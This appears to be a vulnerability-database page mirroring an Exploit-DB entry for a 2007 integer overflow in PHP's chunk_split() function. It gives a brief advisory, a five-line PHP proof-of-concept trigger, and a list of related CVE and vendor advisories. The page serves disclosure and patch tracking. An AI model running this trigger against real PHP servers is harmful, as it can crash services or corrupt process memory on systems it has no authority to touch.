Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbGerhard WagnerEDB-ID:30117
HistoryMay 31, 2007 - 12:00 a.m.

PHP 5.1.6 - 'Chunk_Split()' Integer Overflow

2007-05-3100:00:00
Gerhard Wagner
www.exploit-db.com
41

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/24261/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects versions prior to PHP 5.2.3.

<?
          $a=str_repeat("A", 65535);
          $b=1;
          $c=str_repeat("A", 65535);
          chunk_split($a,$b,$c);
?>

Related

cve 2
nvd 2
veracode 1
cvelist 2
prion 2
securityvulns 2
ubuntucve 2
nessus 25
openvas 34
slackware 1
centos 3
redhat 4
oraclelinux 2
fedora 1
suse 2
ubuntu 2
freebsd 1
gentoo 1
cve
cve
CVE-2007-2872
2007-06-04 17:30:00
CVE-2007-4661
2007-09-04 22:17:00
nvd
nvd
CVE-2007-2872
2007-06-04 17:30:00
CVE-2007-4661
2007-09-04 22:17:00
veracode
veracode
Arbitrary Code Execution
2020-04-10 00:20:27
cvelist
cvelist
CVE-2007-2872
2007-06-04 17:00:00
CVE-2007-4661
2007-09-04 22:00:00
prion
prion
Integer overflow
2007-06-04 17:30:00
Heap overflow
2007-09-04 22:17:00
securityvulns
securityvulns
[OpenPKG-SA-2007.020] OpenPKG Security Advisory &#40;php&#41;
2007-06-01 00:00:00
PHP multiple security vulnerabilities
2007-06-01 00:00:00
ubuntucve
ubuntucve
CVE-2007-4661
2007-09-04 00:00:00
CVE-2007-2872
2007-06-04 00:00:00
nessus
nessus
Slackware 10.2 / 11.0 / current : php5 (SSA:2007-152-01)
2007-06-04 00:00:00
PHP < 5.2.3 Multiple Vulnerabilities
2007-06-02 00:00:00
RHEL 2.1 : php (RHSA-2007:0888)
2007-10-25 00:00:00
openvas
openvas
Slackware: Security Advisory (SSA:2007-152-01)
2012-09-10 00:00:00
Slackware Advisory SSA:2007-152-01 php5
2012-09-11 00:00:00
HP-UX Update for Apache HPSBUX02308
2009-05-05 00:00:00
slackware
slackware
[slackware-security] php5
2007-06-01 21:19:18
centos
centos
php security update
2007-10-24 03:08:58
php security update
2007-09-20 14:31:37
php security update
2007-09-26 09:03:28
redhat
redhat
(RHSA-2007:0888) Moderate: php security update
2007-10-23 00:00:00
(RHSA-2007:0891) Moderate: php security update
2007-10-25 00:00:00
(RHSA-2007:0890) Moderate: php security update
2007-09-20 00:00:00
oraclelinux
oraclelinux
Moderate: php security update
2007-09-26 00:00:00
Moderate: php security update
2007-09-20 00:00:00
fedora
fedora
[SECURITY] Fedora Core 6 Update: php-5.1.6-3.7.fc6
2007-09-24 20:33:40
suse
suse
remote denial of service in php4,php5
2007-07-12 16:26:43
remote code execution in php4, php5
2008-01-29 14:18:48
ubuntu
ubuntu
PHP regression
2007-12-03 00:00:00
PHP vulnerabilities
2007-11-29 00:00:00
freebsd
freebsd
php -- multiple vulnerabilities
2007-08-30 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2007-10-07 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:30117
cve2nvd2veracode1cvelist2prion2securityvulns2ubuntucve2nessus25openvas34slackware1centos3redhat4oraclelinux2fedora1suse2ubuntu2freebsd1gentoo1